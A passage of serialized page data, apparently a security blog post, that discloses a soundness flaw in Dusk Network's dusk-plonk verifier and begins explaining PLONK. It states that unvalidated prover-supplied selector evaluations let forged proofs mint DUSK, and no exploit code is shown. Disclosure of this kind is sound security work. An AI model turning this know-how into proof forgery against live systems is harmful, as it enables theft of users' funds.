raft":6,"_partial":6,"_locale":7,"title":148545,"description":148546,"date":148547,"author":148548,"image":148549,"isFeatured":16,"onBlogPage":16,"tags":148551,"body":148554,"_type":9700,"_id":153817,"_source":9702,"_file":153818,"_stem":153819,"_extension":9705},"/blog/2026-04-30-unverified-evaluations-dusk-plonk","Unverified Evaluations in Dusk's PLONK","Dusk's privacy layer protects ~$60M of DUSK and hinges on one proof check. dusk-plonk's verifier never validated four of the prover's polynomial commitments, enough to mint DUSK from nothing and forge shielded spends the network confirmed as real.","2026-04-30T12:00:00.000Z",[114532,114533],{"src":148550,"width":14,"height":15},"/posts/dusk-commitment-issues/title.png",[148552,148553],"dusk","plonk",{"type":21,"children":148555,"toc":153797},[148556,148562,148603,148615,148621,148635,148640,148646,148937,148941,149213,149443,149449,150133,150137,150632,150640,150646,150665,150670,150676,150901,150940,150951,150957,150968,151676,151681,151684,151690,151743,151778,151810,151815,151819,151822,151828,151839,151852,151883,151950,151958,151980,151993,152420,152443,152448,152451,152456,152483,152579,152590,152637,152675,152686,153024,153041,153049,153052,153058,153063,153097,153105,153186,153189,153195,153209,153227,153232,153272,153280,153301,153304,153310,153315,153380,153394,153397,153403,153443,153454,153459,153464,153470,153484,153565,153586,153613,153616,153622,153636,153641,153646,153651,153786,153792],{"type":24,"tag":25,"props":148557,"children":148559},{"id":148558},"commitment-issues-unverified-evaluations-in-dusks-plonk",[148560],{"type":30,"value":148561},"Commitment Issues: Unverified Evaluations in Dusk's PLONK",{"type":24,"tag":32,"props":148563,"children":148564},{},[148565,148567,148574,148576,148583,148585,148592,148594,148601],{"type":30,"value":148566},"We found a critical soundness vulnerability in ",{"type":24,"tag":188,"props":148568,"children":148571},{"href":148569,"rel":148570},"https://github.com/dusk-network/plonk/",[192],[148572],{"type":30,"value":148573},"dusk-plonk",{"type":30,"value":148575},", the PLONK implementation powering ",{"type":24,"tag":188,"props":148577,"children":148580},{"href":148578,"rel":148579},"https://dusk.network/",[192],[148581],{"type":30,"value":148582},"Dusk Network's",{"type":30,"value":148584}," ~$60M ",{"type":24,"tag":188,"props":148586,"children":148589},{"href":148587,"rel":148588},"https://www.coingecko.com/en/coins/dusk",[192],[148590],{"type":30,"value":148591},"market cap",{"type":30,"value":148593},". By exploiting a gap in the verification step, a malicious prover could forge verifying proofs for arbitrary false statements, bypassing every constraint in the transaction circuit. On the live ",{"type":24,"tag":188,"props":148595,"children":148598},{"href":148596,"rel":148597},"https://github.com/dusk-network/rusk",[192],[148599],{"type":30,"value":148600},"Rusk",{"type":30,"value":148602}," network, this would have enabled minting arbitrary amounts of DUSK and moving forged shielded funds through the normal Phoenix path.",{"type":24,"tag":32,"props":148604,"children":148605},{},[148606,148608,148613],{"type":30,"value":148607},"The root cause was that the prover slipped four public selector evaluations into the proof struct, and the verifier consumed them in its final equation ",{"type":24,"tag":60,"props":148609,"children":148610},{},[148611],{"type":30,"value":148612},"without ever validating them against the trusted commitments in the verifier key.",{"type":30,"value":148614}," The prover can set them to whatever values make the equation pass.",{"type":24,"tag":43,"props":148616,"children":148618},{"id":148617},"how-plonk-works-briefly",[148619],{"type":30,"value":148620},"How PLONK works (briefly)",{"type":24,"tag":32,"props":148622,"children":148623},{},[148624,148626,148633],{"type":30,"value":148625},"For a rigorous treatment see the ",{"type":24,"tag":188,"props":148627,"children":148630},{"href":148628,"rel":148629},"https://eprint.iacr.org/2019/953",[192],[148631],{"type":30,"value":148632},"original paper",{"type":30,"value":148634},"; what follows covers only the parts needed to understand the bug.",{"type":24,"tag":32,"props":148636,"children":148637},{},[148638],{"type":30,"value":148639},"A prover wants to convince a verifier that it knows secret inputs satisfying some computation (an arithmetic circuit) without revealing those inputs, and the resulting proof should be short and quick to verify.",{"type":24,"tag":80,"props":148641,"children":148643},{"id":148642},"arithmetic-circuits-and-constraints",[148644],{"type":30,"value":148645},"Arithmetic circuits and constraints",{"type":24,"tag":32,"props":148647,"children":148648},{},[148649,148651,148700,148702,148851,148853,148936],{"type":30,"value":148650},"An arithmetic circuit is a series of addition and multiplication gates wired together. An example would be proving that we know of some point ",{"type":24,"tag":145,"props":148652,"children":148654},{"className":148653},[10807,10808],[148655],{"type":24,"tag":301,"props":148656,"children":148658},{"className":148657},[10813],[148659],{"type":24,"tag":301,"props":148660,"children":148662},{"className":148661,"ariaHidden":10819},[10818],[148663],{"type":24,"tag":301,"props":148664,"children":148666},{"className":148665},[10824],[148667,148671,148676,148681,148686,148690,148695],{"type":24,"tag":301,"props":148668,"children":148670},{"className":148669,"style":10935},[10829],[],{"type":24,"tag":301,"props":148672,"children":148674},{"className":148673},[28486],[148675],{"type":30,"value":362},{"type":24,"tag":301,"props":148677,"children":148679},{"className":148678},[10835,28357],[148680],{"type":30,"value":26050},{"type":24,"tag":301,"props":148682,"children":148684},{"className":148683},[10946],[148685],{"type":30,"value":10949},{"type":24,"tag":301,"props":148687,"children":148689},{"className":148688,"style":10953},[10914],[],{"type":24,"tag":301,"props":148691,"children":148693},{"className":148692,"style":100230},[10835,28357],[148694],{"type":30,"value":9948},{"type":24,"tag":301,"props":148696,"children":148698},{"className":148697},[28508],[148699],{"type":30,"value":9961},{"type":30,"value":148701}," on an elliptic curve, by e.g proving that ",{"type":24,"tag":145,"props":148703,"children":148705},{"className":148704},[10807,10808],[148706],{"type":24,"tag":301,"props":148707,"children":148709},{"className":148708},[10813],[148710],{"type":24,"tag":301,"props":148711,"children":148713},{"className":148712,"ariaHidden":10819},[10818],[148714,148776,148838],{"type":24,"tag":301,"props":148715,"children":148717},{"className":148716},[10824],[148718,148722,148763,148767,148772],{"type":24,"tag":301,"props":148719,"children":148721},{"className":148720,"style":130075},[10829],[],{"type":24,"tag":301,"props":148723,"children":148725},{"className":148724},[10835],[148726,148731],{"type":24,"tag":301,"props":148727,"children":148729},{"className":148728,"style":100230},[10835,28357],[148730],{"type":30,"value":9948},{"type":24,"tag":301,"props":148732,"children":148734},{"className":148733},[10850],[148735],{"type":24,"tag":301,"props":148736,"children":148738},{"className":148737},[10855],[148739],{"type":24,"tag":301,"props":148740,"children":148742},{"className":148741},[10860],[148743],{"type":24,"tag":301,"props":148744,"children":148746},{"className":148745,"style":10830},[10865],[148747],{"type":24,"tag":301,"props":148748,"children":148749},{"style":10869},[148750,148754],{"type":24,"tag":301,"props":148751,"children":148753},{"className":148752,"style":10875},[10874],[],{"type":24,"tag":301,"props":148755,"children":148757},{"className":148756},[10880,10881,10882,10883],[148758],{"type":24,"tag":301,"props":148759,"children":148761},{"className":148760},[10835,10883],[148762],{"type":30,"value":1503},{"type":24,"tag":301,"props":148764,"children":148766},{"className":148765,"style":11012},[10914],[],{"type":24,"tag":301,"props":148768,"children":148770},{"className":148769},[11017],[148771],{"type":30,"value":523},{"type":24,"tag":301,"props":148773,"children":148775},{"className":148774,"style":11012},[10914],[],{"type":24,"tag":301,"props":148777,"children":148779},{"className":148778},[10824],[148780,148784,148825,148829,148834],{"type":24,"tag":301,"props":148781,"children":148783},{"className":148782,"style":129950},[10829],[],{"type":24,"tag":301,"props":148785,"children":148787},{"className":148786},[10835],[148788,148793],{"type":24,"tag":301,"props":148789,"children":148791},{"className":148790},[10835,28357],[148792],{"type":30,"value":26050},{"type":24,"tag":301,"props":148794,"children":148796},{"className":148795},[10850],[148797],{"type":24,"tag":301,"props":148798,"children":148800},{"className":148799},[10855],[148801],{"type":24,"tag":301,"props":148802,"children":148804},{"className":148803},[10860],[148805],{"type":24,"tag":301,"props":148806,"children":148808},{"className":148807,"style":10830},[10865],[148809],{"type":24,"tag":301,"props":148810,"children":148811},{"style":10869},[148812,148816],{"type":24,"tag":301,"props":148813,"children":148815},{"className":148814,"style":10875},[10874],[],{"type":24,"tag":301,"props":148817,"children":148819},{"className":148818},[10880,10881,10882,10883],[148820],{"type":24,"tag":301,"props":148821,"children":148823},{"className":148822},[10835,10883],[148824],{"type":30,"value":1447},{"type":24,"tag":301,"props":148826,"children":148828},{"className":148827,"style":10915},[10914],[],{"type":24,"tag":301,"props":148830,"children":148832},{"className":148831},[10920],[148833],{"type":30,"value":11206},{"type":24,"tag":301,"props":148835,"children":148837},{"className":148836,"style":10915},[10914],[],{"type":24,"tag":301,"props":148839,"children":148841},{"className":148840},[10824],[148842,148846],{"type":24,"tag":301,"props":148843,"children":148845},{"className":148844,"style":100775},[10829],[],{"type":24,"tag":301,"props":148847,"children":148849},{"className":148848},[10835],[148850],{"type":30,"value":61393},{"type":30,"value":148852},", here in ",{"type":24,"tag":145,"props":148854,"children":148856},{"className":148855},[10807,10808],[148857],{"type":24,"tag":301,"props":148858,"children":148860},{"className":148859},[10813],[148861],{"type":24,"tag":301,"props":148862,"children":148864},{"className":148863,"ariaHidden":10819},[10818],[148865],{"type":24,"tag":301,"props":148866,"children":148868},{"className":148867},[10824],[148869,148874],{"type":24,"tag":301,"props":148870,"children":148873},{"className":148871,"style":148872},[10829],"height:0.8389em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":148875,"children":148877},{"className":148876},[10835],[148878,148883],{"type":24,"tag":301,"props":148879,"children":148881},{"className":148880},[10835,128513],[148882],{"type":30,"value":128516},{"type":24,"tag":301,"props":148884,"children":148886},{"className":148885},[10850],[148887],{"type":24,"tag":301,"props":148888,"children":148890},{"className":148889},[10855,28411],[148891,148925],{"type":24,"tag":301,"props":148892,"children":148894},{"className":148893},[10860],[148895,148920],{"type":24,"tag":301,"props":148896,"children":148898},{"className":148897,"style":99797},[10865],[148899],{"type":24,"tag":301,"props":148900,"children":148901},{"style":99801},[148902,148906],{"type":24,"tag":301,"props":148903,"children":148905},{"className":148904,"style":10875},[10874],[],{"type":24,"tag":301,"props":148907,"children":148909},{"className":148908},[10880,10881,10882,10883],[148910],{"type":24,"tag":301,"props":148911,"children":148913},{"className":148912},[10835,10883],[148914],{"type":24,"tag":301,"props":148915,"children":148917},{"className":148916},[10835,10883],[148918],{"type":30,"value":148919},"37",{"type":24,"tag":301,"props":148921,"children":148923},{"className":148922},[28514],[148924],{"type":30,"value":28517},{"type":24,"tag":301,"props":148926,"children":148928},{"className":148927},[10860],[148929],{"type":24,"tag":301,"props":148930,"children":148932},{"className":148931,"style":99828},[10865],[148933],{"type":24,"tag":301,"props":148934,"children":148935},{},[],{"type":30,"value":206},{"type":24,"tag":148938,"props":148939,"children":148940},"arithmetic-circuit-widget",{},[],{"type":24,"tag":32,"props":148942,"children":148943},{},[148944,148946,148972,148974,149053,149055,149132,149134,149211],{"type":30,"value":148945},"Each gate ",{"type":24,"tag":145,"props":148947,"children":148949},{"className":148948},[10807,10808],[148950],{"type":24,"tag":301,"props":148951,"children":148953},{"className":148952},[10813],[148954],{"type":24,"tag":301,"props":148955,"children":148957},{"className":148956,"ariaHidden":10819},[10818],[148958],{"type":24,"tag":301,"props":148959,"children":148961},{"className":148960},[10824],[148962,148967],{"type":24,"tag":301,"props":148963,"children":148966},{"className":148964,"style":148965},[10829],"height:0.6595em;",[],{"type":24,"tag":301,"props":148968,"children":148970},{"className":148969},[10835,28357],[148971],{"type":30,"value":10564},{"type":30,"value":148973}," has a left input ",{"type":24,"tag":145,"props":148975,"children":148977},{"className":148976},[10807,10808],[148978],{"type":24,"tag":301,"props":148979,"children":148981},{"className":148980},[10813],[148982],{"type":24,"tag":301,"props":148983,"children":148985},{"className":148984,"ariaHidden":10819},[10818],[148986],{"type":24,"tag":301,"props":148987,"children":148989},{"className":148988},[10824],[148990,148995],{"type":24,"tag":301,"props":148991,"children":148994},{"className":148992,"style":148993},[10829],"height:0.8444em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":148996,"children":148998},{"className":148997},[10835],[148999,149004],{"type":24,"tag":301,"props":149000,"children":149002},{"className":149001,"style":99757},[10835,28357],[149003],{"type":30,"value":99760},{"type":24,"tag":301,"props":149005,"children":149007},{"className":149006},[10850],[149008],{"type":24,"tag":301,"props":149009,"children":149011},{"className":149010},[10855,28411],[149012,149042],{"type":24,"tag":301,"props":149013,"children":149015},{"className":149014},[10860],[149016,149037],{"type":24,"tag":301,"props":149017,"children":149019},{"className":149018,"style":100273},[10865],[149020],{"type":24,"tag":301,"props":149021,"children":149023},{"style":149022},"top:-2.55em;margin-left:-0.0197em;margin-right:0.05em;",[149024,149028],{"type":24,"tag":301,"props":149025,"children":149027},{"className":149026,"style":10875},[10874],[],{"type":24,"tag":301,"props":149029,"children":149031},{"className":149030},[10880,10881,10882,10883],[149032],{"type":24,"tag":301,"props":149033,"children":149035},{"className":149034},[10835,28357,10883],[149036],{"type":30,"value":10564},{"type":24,"tag":301,"props":149038,"children":149040},{"className":149039},[28514],[149041],{"type":30,"value":28517},{"type":24,"tag":301,"props":149043,"children":149045},{"className":149044},[10860],[149046],{"type":24,"tag":301,"props":149047,"children":149049},{"className":149048,"style":99828},[10865],[149050],{"type":24,"tag":301,"props":149051,"children":149052},{},[],{"type":30,"value":149054},", right input ",{"type":24,"tag":145,"props":149056,"children":149058},{"className":149057},[10807,10808],[149059],{"type":24,"tag":301,"props":149060,"children":149062},{"className":149061},[10813],[149063],{"type":24,"tag":301,"props":149064,"children":149066},{"className":149065,"ariaHidden":10819},[10818],[149067],{"type":24,"tag":301,"props":149068,"children":149070},{"className":149069},[10824],[149071,149075],{"type":24,"tag":301,"props":149072,"children":149074},{"className":149073,"style":116710},[10829],[],{"type":24,"tag":301,"props":149076,"children":149078},{"className":149077},[10835],[149079,149084],{"type":24,"tag":301,"props":149080,"children":149082},{"className":149081,"style":99745},[10835,28357],[149083],{"type":30,"value":100563},{"type":24,"tag":301,"props":149085,"children":149087},{"className":149086},[10850],[149088],{"type":24,"tag":301,"props":149089,"children":149091},{"className":149090},[10855,28411],[149092,149121],{"type":24,"tag":301,"props":149093,"children":149095},{"className":149094},[10860],[149096,149116],{"type":24,"tag":301,"props":149097,"children":149099},{"className":149098,"style":100273},[10865],[149100],{"type":24,"tag":301,"props":149101,"children":149102},{"style":116739},[149103,149107],{"type":24,"tag":301,"props":149104,"children":149106},{"className":149105,"style":10875},[10874],[],{"type":24,"tag":301,"props":149108,"children":149110},{"className":149109},[10880,10881,10882,10883],[149111],{"type":24,"tag":301,"props":149112,"children":149114},{"className":149113},[10835,28357,10883],[149115],{"type":30,"value":10564},{"type":24,"tag":301,"props":149117,"children":149119},{"className":149118},[28514],[149120],{"type":30,"value":28517},{"type":24,"tag":301,"props":149122,"children":149124},{"className":149123},[10860],[149125],{"type":24,"tag":301,"props":149126,"children":149128},{"className":149127,"style":99828},[10865],[149129],{"type":24,"tag":301,"props":149130,"children":149131},{},[],{"type":30,"value":149133},", and output ",{"type":24,"tag":145,"props":149135,"children":149137},{"className":149136},[10807,10808],[149138],{"type":24,"tag":301,"props":149139,"children":149141},{"className":149140},[10813],[149142],{"type":24,"tag":301,"props":149143,"children":149145},{"className":149144,"ariaHidden":10819},[10818],[149146],{"type":24,"tag":301,"props":149147,"children":149149},{"className":149148},[10824],[149150,149154],{"type":24,"tag":301,"props":149151,"children":149153},{"className":149152,"style":116710},[10829],[],{"type":24,"tag":301,"props":149155,"children":149157},{"className":149156},[10835],[149158,149163],{"type":24,"tag":301,"props":149159,"children":149161},{"className":149160},[10835,28357],[149162],{"type":30,"value":99715},{"type":24,"tag":301,"props":149164,"children":149166},{"className":149165},[10850],[149167],{"type":24,"tag":301,"props":149168,"children":149170},{"className":149169},[10855,28411],[149171,149200],{"type":24,"tag":301,"props":149172,"children":149174},{"className":149173},[10860],[149175,149195],{"type":24,"tag":301,"props":149176,"children":149178},{"className":149177,"style":100273},[10865],[149179],{"type":24,"tag":301,"props":149180,"children":149181},{"style":99801},[149182,149186],{"type":24,"tag":301,"props":149183,"children":149185},{"className":149184,"style":10875},[10874],[],{"type":24,"tag":301,"props":149187,"children":149189},{"className":149188},[10880,10881,10882,10883],[149190],{"type":24,"tag":301,"props":149191,"children":149193},{"className":149192},[10835,28357,10883],[149194],{"type":30,"value":10564},{"type":24,"tag":301,"props":149196,"children":149198},{"className":149197},[28514],[149199],{"type":30,"value":28517},{"type":24,"tag":301,"props":149201,"children":149203},{"className":149202},[10860],[149204],{"type":24,"tag":301,"props":149205,"children":149207},{"className":149206,"style":99828},[10865],[149208],{"type":24,"tag":301,"props":149209,"children":149210},{},[],{"type":30,"value":149212},". The prover's job is to show it knows wire values that satisfy every gate.",{"type":24,"tag":32,"props":149214,"children":149215},{},[149216,149218,149223,149225,149329,149331,149434,149436,149441],{"type":30,"value":149217},"Each gate imposes a constraint, and PLONK unifies all gate types into one expression using ",{"type":24,"tag":5422,"props":149219,"children":149220},{},[149221],{"type":30,"value":149222},"selector",{"type":30,"value":149224}," values that act as switches: setting ",{"type":24,"tag":145,"props":149226,"children":149228},{"className":149227},[10807,10808],[149229],{"type":24,"tag":301,"props":149230,"children":149232},{"className":149231},[10813],[149233],{"type":24,"tag":301,"props":149234,"children":149236},{"className":149235,"ariaHidden":10819},[10818],[149237,149316],{"type":24,"tag":301,"props":149238,"children":149240},{"className":149239},[10824],[149241,149245,149303,149307,149312],{"type":24,"tag":301,"props":149242,"children":149244},{"className":149243,"style":116630},[10829],[],{"type":24,"tag":301,"props":149246,"children":149248},{"className":149247},[10835],[149249,149254],{"type":24,"tag":301,"props":149250,"children":149252},{"className":149251,"style":100230},[10835,28357],[149253],{"type":30,"value":100233},{"type":24,"tag":301,"props":149255,"children":149257},{"className":149256},[10850],[149258],{"type":24,"tag":301,"props":149259,"children":149261},{"className":149260},[10855,28411],[149262,149292],{"type":24,"tag":301,"props":149263,"children":149265},{"className":149264},[10860],[149266,149287],{"type":24,"tag":301,"props":149267,"children":149270},{"className":149268,"style":149269},[10865],"height:0.3283em;",[149271],{"type":24,"tag":301,"props":149272,"children":149273},{"style":100277},[149274,149278],{"type":24,"tag":301,"props":149275,"children":149277},{"className":149276,"style":10875},[10874],[],{"type":24,"tag":301,"props":149279,"children":149281},{"className":149280},[10880,10881,10882,10883],[149282],{"type":24,"tag":301,"props":149283,"children":149285},{"className":149284,"style":101752},[10835,28357,10883],[149286],{"type":30,"value":101755},{"type":24,"tag":301,"props":149288,"children":149290},{"className":149289},[28514],[149291],{"type":30,"value":28517},{"type":24,"tag":301,"props":149293,"children":149295},{"className":149294},[10860],[149296],{"type":24,"tag":301,"props":149297,"children":149299},{"className":149298,"style":99828},[10865],[149300],{"type":24,"tag":301,"props":149301,"children":149302},{},[],{"type":24,"tag":301,"props":149304,"children":149306},{"className":149305,"style":11012},[10914],[],{"type":24,"tag":301,"props":149308,"children":149310},{"className":149309},[11017],[149311],{"type":30,"value":523},{"type":24,"tag":301,"props":149313,"children":149315},{"className":149314,"style":11012},[10914],[],{"type":24,"tag":301,"props":149317,"children":149319},{"className":149318},[10824],[149320,149324],{"type":24,"tag":301,"props":149321,"children":149323},{"className":149322,"style":100775},[10829],[],{"type":24,"tag":301,"props":149325,"children":149327},{"className":149326},[10835],[149328],{"type":30,"value":546},{"type":30,"value":149330}," makes a row a multiplication gate, setting ",{"type":24,"tag":145,"props":149332,"children":149334},{"className":149333},[10807,10808],[149335],{"type":24,"tag":301,"props":149336,"children":149338},{"className":149337},[10813],[149339],{"type":24,"tag":301,"props":149340,"children":149342},{"className":149341,"ariaHidden":10819},[10818],[149343,149421],{"type":24,"tag":301,"props":149344,"children":149346},{"className":149345},[10824],[149347,149351,149408,149412,149417],{"type":24,"tag":301,"props":149348,"children":149350},{"className":149349,"style":116630},[10829],[],{"type":24,"tag":301,"props":149352,"children":149354},{"className":149353},[10835],[149355,149360],{"type":24,"tag":301,"props":149356,"children":149358},{"className":149357,"style":100230},[10835,28357],[149359],{"type":30,"value":100233},{"type":24,"tag":301,"props":149361,"children":149363},{"className":149362},[10850],[149364],{"type":24,"tag":301,"props":149365,"children":149367},{"className":149366},[10855,28411],[149368,149397],{"type":24,"tag":301,"props":149369,"children":149371},{"className":149370},[10860],[149372,149392],{"type":24,"tag":301,"props":149373,"children":149375},{"className":149374,"style":149269},[10865],[149376],{"type":24,"tag":301,"props":149377,"children":149378},{"style":100277},[149379,149383],{"type":24,"tag":301,"props":149380,"children":149382},{"className":149381,"style":10875},[10874],[],{"type":24,"tag":301,"props":149384,"children":149386},{"className":149385},[10880,10881,10882,10883],[149387],{"type":24,"tag":301,"props":149388,"children":149390},{"className":149389},[10835,28357,10883],[149391],{"type":30,"value":124703},{"type":24,"tag":301,"props":149393,"children":149395},{"className":149394},[28514],[149396],{"type":30,"value":28517},{"type":24,"tag":301,"props":149398,"children":149400},{"className":149399},[10860],[149401],{"type":24,"tag":301,"props":149402,"children":149404},{"className":149403,"style":99828},[10865],[149405],{"type":24,"tag":301,"props":149406,"children":149407},{},[],{"type":24,"tag":301,"props":149409,"children":149411},{"className":149410,"style":11012},[10914],[],{"type":24,"tag":301,"props":149413,"children":149415},{"className":149414},[11017],[149416],{"type":30,"value":523},{"type":24,"tag":301,"props":149418,"children":149420},{"className":149419,"style":11012},[10914],[],{"type":24,"tag":301,"props":149422,"children":149424},{"className":149423},[10824],[149425,149429],{"type":24,"tag":301,"props":149426,"children":149428},{"className":149427,"style":100775},[10829],[],{"type":24,"tag":301,"props":149430,"children":149432},{"className":149431},[10835],[149433],{"type":30,"value":546},{"type":30,"value":149435}," makes it contribute an addition term, and so on. The selector values define the circuit's shape and are public, known to both prover and verifier, while the wire values are the prover's secret witness. This per-row check does not ensure that wires between gates are consistent (that the output of one gate equals the input of the next); PLONK uses a separate ",{"type":24,"tag":5422,"props":149437,"children":149438},{},[149439],{"type":30,"value":149440},"permutation argument",{"type":30,"value":149442}," for that, which we will not cover here.",{"type":24,"tag":80,"props":149444,"children":149446},{"id":149445},"from-many-checks-to-one",[149447],{"type":30,"value":149448},"From many checks to one",{"type":24,"tag":32,"props":149450,"children":149451},{},[149452,149454,149459,149460,149552,149553,149645,149646,149738,149740,149745,149746,149838,149839,149931,149933,149958,149959,149984,149986,150078,150080,150105,150107,150132],{"type":30,"value":149453},"Instead of checking each gate individually, PLONK reads the execution trace column by column and uses FFT interpolation to convert each array of values to a single polynomial. The wire values become ",{"type":24,"tag":5422,"props":149455,"children":149456},{},[149457],{"type":30,"value":149458},"witness polynomials",{"type":30,"value":13277},{"type":24,"tag":145,"props":149461,"children":149463},{"className":149462},[10807,10808],[149464],{"type":24,"tag":301,"props":149465,"children":149467},{"className":149466},[10813],[149468],{"type":24,"tag":301,"props":149469,"children":149471},{"className":149470,"ariaHidden":10819},[10818],[149472],{"type":24,"tag":301,"props":149473,"children":149475},{"className":149474},[10824],[149476,149480,149537,149542,149547],{"type":24,"tag":301,"props":149477,"children":149479},{"className":149478,"style":10935},[10829],[],{"type":24,"tag":301,"props":149481,"children":149483},{"className":149482},[10835],[149484,149489],{"type":24,"tag":301,"props":149485,"children":149487},{"className":149486,"style":102098},[10835,28357],[149488],{"type":30,"value":39835},{"type":24,"tag":301,"props":149490,"children":149492},{"className":149491},[10850],[149493],{"type":24,"tag":301,"props":149494,"children":149496},{"className":149495},[10855,28411],[149497,149526],{"type":24,"tag":301,"props":149498,"children":149500},{"className":149499},[10860],[149501,149521],{"type":24,"tag":301,"props":149502,"children":149504},{"className":149503,"style":149269},[10865],[149505],{"type":24,"tag":301,"props":149506,"children":149507},{"style":102119},[149508,149512],{"type":24,"tag":301,"props":149509,"children":149511},{"className":149510,"style":10875},[10874],[],{"type":24,"tag":301,"props":149513,"children":149515},{"className":149514},[10880,10881,10882,10883],[149516],{"type":24,"tag":301,"props":149517,"children":149519},{"className":149518},[10835,28357,10883],[149520],{"type":30,"value":124703},{"type":24,"tag":301,"props":149522,"children":149524},{"className":149523},[28514],[149525],{"type":30,"value":28517},{"type":24,"tag":301,"props":149527,"children":149529},{"className":149528},[10860],[149530],{"type":24,"tag":301,"props":149531,"children":149533},{"className":149532,"style":99828},[10865],[149534],{"type":24,"tag":301,"props":149535,"children":149536},{},[],{"type":24,"tag":301,"props":149538,"children":149540},{"className":149539},[28486],[149541],{"type":30,"value":362},{"type":24,"tag":301,"props":149543,"children":149545},{"className":149544},[10835,28357],[149546],{"type":30,"value":26050},{"type":24,"tag":301,"props":149548,"children":149550},{"className":149549},[28508],[149551],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":149554,"children":149556},{"className":149555},[10807,10808],[149557],{"type":24,"tag":301,"props":149558,"children":149560},{"className":149559},[10813],[149561],{"type":24,"tag":301,"props":149562,"children":149564},{"className":149563,"ariaHidden":10819},[10818],[149565],{"type":24,"tag":301,"props":149566,"children":149568},{"className":149567},[10824],[149569,149573,149630,149635,149640],{"type":24,"tag":301,"props":149570,"children":149572},{"className":149571,"style":10935},[10829],[],{"type":24,"tag":301,"props":149574,"children":149576},{"className":149575},[10835],[149577,149582],{"type":24,"tag":301,"props":149578,"children":149580},{"className":149579,"style":102098},[10835,28357],[149581],{"type":30,"value":39835},{"type":24,"tag":301,"props":149583,"children":149585},{"className":149584},[10850],[149586],{"type":24,"tag":301,"props":149587,"children":149589},{"className":149588},[10855,28411],[149590,149619],{"type":24,"tag":301,"props":149591,"children":149593},{"className":149592},[10860],[149594,149614],{"type":24,"tag":301,"props":149595,"children":149597},{"className":149596,"style":149269},[10865],[149598],{"type":24,"tag":301,"props":149599,"children":149600},{"style":102119},[149601,149605],{"type":24,"tag":301,"props":149602,"children":149604},{"className":149603,"style":10875},[10874],[],{"type":24,"tag":301,"props":149606,"children":149608},{"className":149607},[10880,10881,10882,10883],[149609],{"type":24,"tag":301,"props":149610,"children":149612},{"className":149611,"style":129515},[10835,28357,10883],[149613],{"type":30,"value":129518},{"type":24,"tag":301,"props":149615,"children":149617},{"className":149616},[28514],[149618],{"type":30,"value":28517},{"type":24,"tag":301,"props":149620,"children":149622},{"className":149621},[10860],[149623],{"type":24,"tag":301,"props":149624,"children":149626},{"className":149625,"style":99828},[10865],[149627],{"type":24,"tag":301,"props":149628,"children":149629},{},[],{"type":24,"tag":301,"props":149631,"children":149633},{"className":149632},[28486],[149634],{"type":30,"value":362},{"type":24,"tag":301,"props":149636,"children":149638},{"className":149637},[10835,28357],[149639],{"type":30,"value":26050},{"type":24,"tag":301,"props":149641,"children":149643},{"className":149642},[28508],[149644],{"type":30,"value":9961},{"type":30,"value":377},{"type":24,"tag":145,"props":149647,"children":149649},{"className":149648},[10807,10808],[149650],{"type":24,"tag":301,"props":149651,"children":149653},{"className":149652},[10813],[149654],{"type":24,"tag":301,"props":149655,"children":149657},{"className":149656,"ariaHidden":10819},[10818],[149658],{"type":24,"tag":301,"props":149659,"children":149661},{"className":149660},[10824],[149662,149666,149723,149728,149733],{"type":24,"tag":301,"props":149663,"children":149665},{"className":149664,"style":10935},[10829],[],{"type":24,"tag":301,"props":149667,"children":149669},{"className":149668},[10835],[149670,149675],{"type":24,"tag":301,"props":149671,"children":149673},{"className":149672,"style":102098},[10835,28357],[149674],{"type":30,"value":39835},{"type":24,"tag":301,"props":149676,"children":149678},{"className":149677},[10850],[149679],{"type":24,"tag":301,"props":149680,"children":149682},{"className":149681},[10855,28411],[149683,149712],{"type":24,"tag":301,"props":149684,"children":149686},{"className":149685},[10860],[149687,149707],{"type":24,"tag":301,"props":149688,"children":149690},{"className":149689,"style":149269},[10865],[149691],{"type":24,"tag":301,"props":149692,"children":149693},{"style":102119},[149694,149698],{"type":24,"tag":301,"props":149695,"children":149697},{"className":149696,"style":10875},[10874],[],{"type":24,"tag":301,"props":149699,"children":149701},{"className":149700},[10880,10881,10882,10883],[149702],{"type":24,"tag":301,"props":149703,"children":149705},{"className":149704,"style":99745},[10835,28357,10883],[149706],{"type":30,"value":122058},{"type":24,"tag":301,"props":149708,"children":149710},{"className":149709},[28514],[149711],{"type":30,"value":28517},{"type":24,"tag":301,"props":149713,"children":149715},{"className":149714},[10860],[149716],{"type":24,"tag":301,"props":149717,"children":149719},{"className":149718,"style":99828},[10865],[149720],{"type":24,"tag":301,"props":149721,"children":149722},{},[],{"type":24,"tag":301,"props":149724,"children":149726},{"className":149725},[28486],[149727],{"type":30,"value":362},{"type":24,"tag":301,"props":149729,"children":149731},{"className":149730},[10835,28357],[149732],{"type":30,"value":26050},{"type":24,"tag":301,"props":149734,"children":149736},{"className":149735},[28508],[149737],{"type":30,"value":9961},{"type":30,"value":149739}," and the selectors become ",{"type":24,"tag":5422,"props":149741,"children":149742},{},[149743],{"type":30,"value":149744},"selector polynomials",{"type":30,"value":13277},{"type":24,"tag":145,"props":149747,"children":149749},{"className":149748},[10807,10808],[149750],{"type":24,"tag":301,"props":149751,"children":149753},{"className":149752},[10813],[149754],{"type":24,"tag":301,"props":149755,"children":149757},{"className":149756,"ariaHidden":10819},[10818],[149758],{"type":24,"tag":301,"props":149759,"children":149761},{"className":149760},[10824],[149762,149766,149823,149828,149833],{"type":24,"tag":301,"props":149763,"children":149765},{"className":149764,"style":10935},[10829],[],{"type":24,"tag":301,"props":149767,"children":149769},{"className":149768},[10835],[149770,149775],{"type":24,"tag":301,"props":149771,"children":149773},{"className":149772},[10835,28357],[149774],{"type":30,"value":83514},{"type":24,"tag":301,"props":149776,"children":149778},{"className":149777},[10850],[149779],{"type":24,"tag":301,"props":149780,"children":149782},{"className":149781},[10855,28411],[149783,149812],{"type":24,"tag":301,"props":149784,"children":149786},{"className":149785},[10860],[149787,149807],{"type":24,"tag":301,"props":149788,"children":149790},{"className":149789,"style":149269},[10865],[149791],{"type":24,"tag":301,"props":149792,"children":149793},{"style":99801},[149794,149798],{"type":24,"tag":301,"props":149795,"children":149797},{"className":149796,"style":10875},[10874],[],{"type":24,"tag":301,"props":149799,"children":149801},{"className":149800},[10880,10881,10882,10883],[149802],{"type":24,"tag":301,"props":149803,"children":149805},{"className":149804,"style":101752},[10835,28357,10883],[149806],{"type":30,"value":101755},{"type":24,"tag":301,"props"